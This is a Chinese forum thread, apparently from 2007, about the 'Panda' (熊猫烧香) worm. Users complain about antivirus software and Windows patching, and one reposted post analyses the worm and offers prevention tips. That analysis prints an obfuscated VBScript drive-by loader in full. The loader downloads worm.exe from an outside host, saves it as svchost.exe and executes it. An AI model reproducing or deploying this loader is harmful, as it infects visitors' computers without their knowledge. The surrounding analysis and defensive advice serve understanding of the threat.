杀毒软件在现在看来似乎妈始终走在病毒之后！

呵呵。我的电脑最棒，我天天上20个小时的网，到现在也没见过那个熊猫拜佛的样子！。。

呵呵。本公司100台电脑到现在一也没发现中毒。。幸运啊。。咯咯~~！

这真是如你所说的,这一切才刚刚开始,我们平民百姓对于安全的认识还远远不够,我们只靠这几个杀毒软件来帮助我防毒还是不够,因为杀毒软件还是不能达到跟病毒发展同步的!我们真的要记住这个"武汉男生"!-_____这一切刚刚才开始!

我公司25日发现中"熊猫"瑞星及其专杀完全变以垃圾.最后用了江民专杀搞好了!"熊猫"出现了几天了25日其杀毒软件还不能用.我可以怎么样-------选择其它杀毒软件
瑞星=垃圾
瑞星=垃圾
瑞星=垃圾
瑞星=垃圾
瑞星=垃圾
瑞星=垃圾
瑞星=垃圾
瑞星=垃圾
升了26日的也不行.大家要转它杀毒软件了!

我学校的计算机全部都着了.
真实太可恶了

还是经常的升级杀软和防火墙比较好。

微软的补丁，我好像没有打过。

最好使用网警的防火墙规则包,以防万一!

为什么不打补丁？很大程度上是微软起初的反盗版策略吓坏了一批人，使得用户不敢自动更新/Windows Update，这样就使病毒有了可趁之机。这真地可以从侧面验证了以前安全专家对于微软反盗版策略的忧虑。如果有心去做一下调查，询问用户为什么不去打补丁，相当一部分是害怕微软反盗版策略的。

看到前面仁兄的这段话，我想起到目前为止，我们都依赖Windows，使得我们都理所当然地依赖它，泱泱大国，还没有自己的一套操作系统可以普及，不能不说是一个悲哀。经过N年的使用，熟悉它的人越来越多，那么能找到它的漏洞的人也就越来越多，因此，我们永远都只能跟在病毒后面跑，因为我们不知道那些隐藏身份的人哪一分哪一秒又找到Windows的安全漏洞了。

＂熊猫＂病毒的作者太不要脸了，我也看不过去了，谈谈我对熊猫病毒的行为分析
评论(0)发表时间：2007年1月24日 23时45分
转自：http://492163612.qzone.qq.com  孤独的网虫

[%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]％]
[%_repeat_0%]


 
＂熊猫＂又名武汉男生，可能是武汉的人做的病毒～～继武汉公交车事件后又一丑闻！
且不说这些了！分析一下熊猫病毒的病毒运行过程和中招症状吧！
１.＂熊猫＂病毒习惯上寄生在一些网络安全意识差的网站主页上，所有浏览这个网站的人都会中招，（也不排除一些人品垃圾的站长自己放木马！）
２.＂熊猫＂病毒运行的时候，是由VBScript脚本引导发起的．先是由网页中的VBScript脚本在中招的电脑中编写一个程序并运行，编写的这个＂引导程序＂并不含病毒特征码，也没有破坏行为，但是它会运行taskkill命令关闭用户电脑中的病毒防护程序和系统服务，然后从指定的网址下载病毒本程序并运行！ＯＫ
我这里附上某一＂熊猫＂病毒的VBScript引导源码：
<script type="text/jscript">
function init () {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
tcsafe = "http://www.krvkr.com/worm.exe"
z1="o"
z2="b"
z3="j"
z4="e"
z5="c"
z6="t"
m1=z1&z2&z3&z4&z5&z6
m2="c"&"l"&"a"&"s"&"s"&"i"&"d"
m3="c"&"l"&"s"&"i"&"d:"&"BD"&"9"&"6"&"C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&"3"&"6"
m4="M"&"i"&"c"&"r"&"o"&"s"&"o"&"f"&"t"&"."&"X"&"M"&"L"&"H"&"T"&"T"&"P"
m5="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"&"t"&"i"&"o"&"n"
m6="S"&"c"&"r"&"i"&"p"&"t"&"i"&"n"&"g"&"."&"F"&"i"&"l"&"e"&"S"&"y"&"s"&"t"&"e"&"m"&"O"&"b"&"j"&"e"&"c"&"t"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="o"&"p"&"e"&"n"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="A"&"d"&"o"
a2="d"&"b"&"."
a3="S"&"t"&"r"
a4="e"&"a"&"m"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="G"&"E"&"T"
Xd.Open Xh, tcsafe, Fal**
*d.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
sub tcsafe2exe(Xe,X9)
X9= Xb.BuildPath(Xe,X9)
end sub
Xa.open
X8="X"&"a"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"a"&"t"&"h(Xa,X8)"
X7="Xb.B"&"ui"&"ld"&"Pa"&"th(Xb,X7)"
X6="Xc.B"&"u"&"il"&"dP"&"at"&"h(Xd,X6)"
X5="X"&"d.Bu"&"il"&"dP"&"a"&"t"&"h(Xf,X5)"
X4="Xe.B"&"ui"&"ld"&"Pa"&"t"&"h(Xg,X4)"
X3="X"&"f.Bu"&"il"&"d"&"Pa"&"t"&"h(Xh,X4)"
X2="Xg.B"&"ui"&"l"&"d"&"Pa"&"t"&"h(Xi,X3)"
X1="Xh.B"&"u"&"i"&"ld"&"Pa"&"t"&"h(Xg,X1)"
X0="Xi.B"&"u"&"i"&"ld"&"P"&"a"&"th(Xk,X0)"
call tcsafe2exe(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
３.当病毒开始运行后，用户的任务管理器会被禁用，winrar也会并破坏，也无法查看隐藏文件，所有的盘符都被加上autorun标志，更变态的变种，还会删除ＧＨＯ系统备份，让用户彻底绝望．如果用户在局域网络中，病毒会利用弱口令＋默认共享肆意传播．更多的变态行为还在持续中，不知道再过几天，＂熊猫＂会不会学会刷ＢＩＯＳ和调ＣＰＵ电压！硬件厂商该乐了！
废话少说了，谈一下预防的方法吧
服务器系统：我个人维护着１０多台服务器，包括游戏服务器，电影服务器和Ｗeb服务器等，我习惯的防护措施是：东方卫士只读防火墙＋组策略＋安全权限
除非我要新安装软件才打开防火墙,平时都是设置在只读模式,系统禁止了可执行文件和脚本文件、Dll文件的新增和修改、删除。但并不影响服务器正常情况下的使用！组策略中禁用了一些关键的操作（这些操作只在系统构建的时候使用），完全权限对C盘的系统目录设置了保护，如果是web服务器则需要对权限分类一般我会把最高权限的用户设置成只允许本地计算机登陆，然后设置只允许这个用户使用注册表工具，组策略。个人觉的windows 2003设置完善之后， 安全系数并不比linux 等系统差，我个人对这两种服务器系统都喜欢，并且都在使用！
家庭用户的防范措施：
我推荐：东方卫士防火墙＋安全权限+常见病毒免疫补丁
我觉得家用电脑使用东方卫士的只读防护并不会影响正常的使用！
在只读模式下，用户存取办公文档，下载电影音乐等等，唯一要做的就是再安装软件和下载软件的时候，要把防火墙调到普通模式，等安装和下载完毕后再设置回只读防护就可以！这样一来，系统会很安全。
再就是利用伪病毒文件名的方法，免疫一些常见的病毒！并把这些文件设置成所有用户禁止读写！

后语：国内的杀毒软件太被动，其实一款好的杀毒软件不应该只是特征码分析，更应该在程序的行为分析上下工夫！

本文提到的病毒免疫工具和东方卫士我将在后面的日记中发出来！